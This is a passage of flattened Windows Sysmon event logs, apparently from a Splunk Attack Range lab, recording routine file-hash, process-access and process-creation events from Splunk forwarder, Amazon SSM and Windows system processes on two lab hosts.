Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE5301F715FA735979D194409AB3F7BE,SHA256=8CA0949D4FB12C6A178E2C5287919AF8A94A3DDFFF8EE1F63F3C37ACDFE03743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:23.439{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F3F22FAA37A298F799C8F6D60725A6,SHA256=8D665CE7D42661666BD487B34FDCAFADD0A4A529D6625590DC7A40346950E79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:23.328{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-003MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:23.114{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4321MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:24.699{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07154B2EA78BD01DBD2ADC588B225F2B,SHA256=0EEA916EBDE0D1372CB0A064D9C7F15E344FDB17C995963C148A919E9324C93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:24.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=957181ECD74B92C825D52EC6CBD9AF0C,SHA256=104B99EAE804B0B422DA8E10E38433B332231E69CB0C77DE65C831EC86E3A2C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:24.342{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-004MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:25.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9526B3C351D48290EBD7B071D9EC68F,SHA256=AB65E5880AC8D5208307B182403100F86326F0B515DE8739022F278AB2DB06B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.694{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DC9-6151-1B7A-00000000FD01}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.694{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8DC9-6151-1B7A-00000000FD01}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.676{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DC9-6151-1B7A-00000000FD01}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.661{69CF5F33-8DC9-6151-1B7A-00000000FD01}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:25.520{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C265EA5A49ABA660C5E50FF847D773B,SHA256=8ED1D3EAADB4DAA0F0CF9F608FB077EFE776F3173D15325CFA9824C2A87F748C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:26.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=652A7126B907134591ED0C9D3DCE203D,SHA256=B3BE0FB1570AC108E5D7257FF1F7D3028CCC98F789700BCAEF5246CDEAD3E195,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DCA-6151-1D7A-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:26.957{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 